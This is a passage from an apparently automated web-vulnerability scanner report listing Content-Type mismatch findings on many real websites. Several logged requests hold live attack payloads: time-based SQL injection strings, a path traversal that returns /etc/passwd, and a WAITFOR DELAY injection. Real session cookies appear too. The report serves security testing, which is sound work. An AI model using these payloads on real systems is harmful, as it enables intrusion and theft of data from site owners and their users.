Last-Modified: Thu, 16 Mar 2006 00:03:56 GMT
Accept-Ranges: bytes
ETag: "07e251e8d48c61:0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:33:32 GMT
Connection: close
Content-Length: 296

Function VBGetSwfVer(i)
   on error resume next
   Dim swControl, swVersion
   swVersion = 0

   set swControl = CreateObject("ShockwaveFlash.ShockwaveFlash." + CStr(i))
   if (IsObject(swControl)) then

...[SNIP]...
33.67. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pubspec/scripts/isE3OnHtx.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /pubspec/scripts/isE3OnHtx.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=info
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 18
Content-Type: text/html
Cache-Control: private
Date: Fri, 06 May 2011 22:35:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 18

var isE3On = true;
33.68. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.expedia.com
Path:   /pubspec/scripts/isE3OnHtx.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /pubspec/scripts/isE3OnHtx.asp HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`user=v.8,0,EX019BC74F84p$B7202000$84$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$94$FF$C5o$B2$E2$9D$21$D6$EF$B2u!e02000`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`383; p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Length: 18
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:27 GMT
Connection: keep-alive

var isE3On = true;
33.69. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.102
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
33.70. http://www.firstmateonline.com/businessinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.firstmateonline.com
Path:   /businessinfo.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /businessinfo.php?location=17044%27%20and%20sleep%284%29%3d%27&sponsor=8159 HTTP/1.1
Cookie: fancyform=d9c8713861eb02680a2466c6a2547880; PHPSESSID=1efaeee0b0a2648e13c04a21839ee72b; zZ=a0
Host: www.firstmateonline.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:24:50 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 226

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and sleep(4)=\' AND s.publishonline = 1 AND s.deleted = 0 AND
...[SNIP]...
33.71. http://www.google.com/mbd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /mbd

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=%22powered+by+Clone+Guard%22&hl=en&biw=1066&bih=925&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=14143267322426964660&usg=19a3&zx=1304748753488 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=powered+by+Clone+Guard
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 May 2011 01:12:34 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 7766

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...
33.72. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Clone+Guard HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=46=OWH5Day_z-dvNKz2zUPZ66bscqIQiXCwXcDUm788v-iY-VVDvGxPmnsbAFwU7P_idDvVtkqQwa_yvFS_xH-pHPbTamh5YBpBZYNPycAcjuWO2VSpk71uhgayNx6KcbrM; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:50:06 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 16860

ShjDd-Or....S....L..;............Gs#..Clone Guard.7%...PpfETZbMIYbKgQe5-JHLBA",kEXPI:"17259,24472,25907,27147,28505,28554,28766,28887,29229,29509,29666,29685,29795,29822,29858,29881,30035,30107",kCSI:
...[SNIP]...
33.73. http://www.lbmc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lbmc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.1.10.1304749048

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:23:14 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 01 Oct 2008 16:43:45 GMT
ETag: "6983f0-57e-cdbaf240"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:23:14 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................W(...................................................................................................................................
...[SNIP]...
33.74. http://www.lbmc.com/misc/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lbmc.com
Path:   /misc/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /misc/favicon.ico HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; has_js=1; __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.2.10.1304749048

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:26:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 01 Oct 2008 16:43:45 GMT
ETag: "6a81b3-57e-cdbaf240"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:26:19 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................W(...................................................................................................................................
...[SNIP]...
33.75. http://www.lbmc.com/sites/default/files/imagecache/profile-150x200/gherman.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lbmc.com
Path:   /sites/default/files/imagecache/profile-150x200/gherman.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /sites/default/files/imagecache/profile-150x200/gherman.jpg HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/service/investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.4.10.1304749048; has_js=1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:15:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 24 Aug 2010 18:06:09 GMT
ETag: "6b801c-b2a7-9e99e640"
Accept-Ranges: bytes
Content-Length: 45735
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:15:37 GMT
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR.............
..e.. .IDATx.t.[.$.r..s.KfUu..^..sxp........D...=...b&}.}5=J/..H.4..@........TU^"....YQ..2k....................*.0.\ .....+...iY8.N..GJ)L.D...=.{....x...8.....4!"xQJ)....
...[SNIP]...
33.76. https://www.mavitunasecurity.com/support/checkupdate/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.mavitunasecurity.com
Path:   /support/checkupdate/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:18:56 GMT

0.0.0.0
33.77. http://www.millerwelds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC; __utma=94003201.1070057693.1303147760.1303147760.1304727090.2; __utmb=94003201.1.10.1304727090; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 13 Jan 2011 19:37:29 GMT
Content-Length: 3638
Date: Fri, 06 May 2011 19:11:42 GMT
X-Varnish: 1128233734 1128212240
Age: 128
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

..............h...&... ..............(....... ...........@.............................P.OOO......V..................777..p5.............___...........m..c"...............\...........................
...[SNIP]...
33.78. http://www.networksolutions.com/jsonBrowserInfo.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /jsonBrowserInfo.do

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /jsonBrowserInfo.do?default-method=javascriptEnabled&data={%22javascriptEnabled%22:%22true%22} HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
Origin: http://www.networksolutions.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false
Content-Length: 0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:16:25 GMT
X-powered-by: Servlet/2.5
Content-type: text/html
Date: Sat, 07 May 2011 01:16:25 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:16:25 GMT; Path=/
Vary: accept-encoding
Content-Length: 16

{"success":true}
33.79. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /includes/javascript.php?script=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1875

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/
...[SNIP]...
33.80. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:30%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:49:36 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:59:06 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 2393


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Friday, May 06, 2011 12:49:36 PM
- Source :        .Net SqlClient Data Provider
- Message :        Timeout expired.
...[SNIP]...
33.81. http://www.scout.com/webproxy.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scout.com
Path:   /webproxy.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /webproxy.ashx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 20:44:55 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50

The 'URL' query string parameter must be supplied.
33.82. http://www.secureworks.com/images/rssfeed.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.secureworks.com
Path:   /images/rssfeed.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/rssfeed.gif HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:17:31 GMT
Server: Apache
Last-Modified: Fri, 06 Mar 2009 23:01:00 GMT
ETag: "414099-2df-4647b42202300"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: image/gif
Content-Length: 735

.PNG
.
...IHDR.............(.......PLTE.]...^..C..n.s#..N.....7.w;.p%..1.k.....v#........P..,.^$..d..o..2.<.t$...........).h..v'..R.....P........=..O.r,.....T.a...4.t...J.~<.r)..B..#..+..p..8./..h
...[SNIP]...
33.83. http://www.skichalets.co.uk/top/Crossfader.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skichalets.co.uk
Path:   /top/Crossfader.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /top/Crossfader.js HTTP/1.1
Host: www.skichalets.co.uk
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:32:55 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2034

/**
* author:        Timothy Groves - http://www.brandspankingnew.net
*    version:    1.3 - 2006-11-02
*/
var useBSNns;

if (useBSNns)
{
   if (typeof(bsn) == "undefined")
       bsn = {}
   var _bsn = bsn;
}
else
{

...[SNIP]...
33.84. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain HTML.

Request

GET /button/image/?b=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 20:45:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Last-Modified: Fri, 06 May 2011 15:45:48 -0500
Accept-Ranges: bytes
Content-Length: 286
Content-Type: image/gif

<br />
<b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/w
...[SNIP]...
33.85. http://www.socialfollow.com/js/flash-detect.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /js/flash-detect.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

